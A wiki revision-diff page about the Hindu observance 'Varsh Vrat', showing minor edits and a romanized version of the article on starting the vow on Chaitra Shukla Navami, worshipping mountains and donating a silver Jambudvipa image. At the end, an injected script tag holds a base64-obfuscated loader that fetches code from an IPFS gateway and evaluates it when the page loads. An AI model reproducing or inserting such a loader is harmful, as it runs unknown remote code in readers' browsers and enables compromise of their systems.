Difference between revisions of "वर्ष व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[नवमी]] से आरम्भ करना चाहिए।
 
*यह व्रत [[चैत्र]] [[शुक्ल पक्ष]] की [[नवमी]] से आरम्भ करना चाहिए।
*[[हिमालय]], हेमकूट, श्रंगवान, मेरु, मलयवान, गंधमादन नामक बड़े पर्वतों की पूजा करनी चाहिए। उस दिन उपवास करना चाहिए।
+
*[[हिमालय]], [[हेमकूट]], [[श्रंगवान]], मेरु, मलयवान, [[गंधमादन पर्वत|गंधमादन]] नामक बड़े पर्वतों की पूजा करनी चाहिए। उस दिन उपवास करना चाहिए।
*व्रत के अन्त में जम्बूद्वीप की रजत आकृति का दान करना चाहिए। इनमें<ref>हेमाद्रि (व्रतखण्ड 1, 959, विष्णुधर्मोत्तरपुराण से उद्धरण)। [[ब्रह्मपुराण]] (18|16), [[मत्स्यपुराण]] (113|10-12) एवं [[वायुपुराण]] (1|8)</ref> हिमालय, हेमकूट आदि को वर्षपर्वत की संज्ञा दी गयी है।  
+
*व्रत के अन्त में जम्बूद्वीप की रजत आकृति का दान करना चाहिए। इनमें<ref>हेमाद्रि (व्रतखण्ड 1, 959, विष्णुधर्मोत्तरपुराण से उद्धरण)। [[ब्रह्मपुराण]] (18|16), [[मत्स्यपुराण]] (113|10-12) एवं [[वायुपुराण]] (1|8</ref> हिमालय, हेमकूट आदि को वर्षपर्वत की संज्ञा दी गयी है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 06:51, 5 September 2012

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat chaitr shukl paksh ki navami se arambh karana chahie.
  • himalay, hemakoot, shrangavan, meru, malayavan, gandhamadan namak b de parvatoan ki pooja karani chahie. us din upavas karana chahie.
  • vrat ke ant mean jamboodvip ki rajat akriti ka dan karana chahie. inamean[1] himalay, hemakoot adi ko varshaparvat ki sanjna di gayi hai.


tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 959, vishnudharmottarapuran se uddharan). brahmapuran (18|16), matsyapuran (113|10-12) evan vayupuran (1|8

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>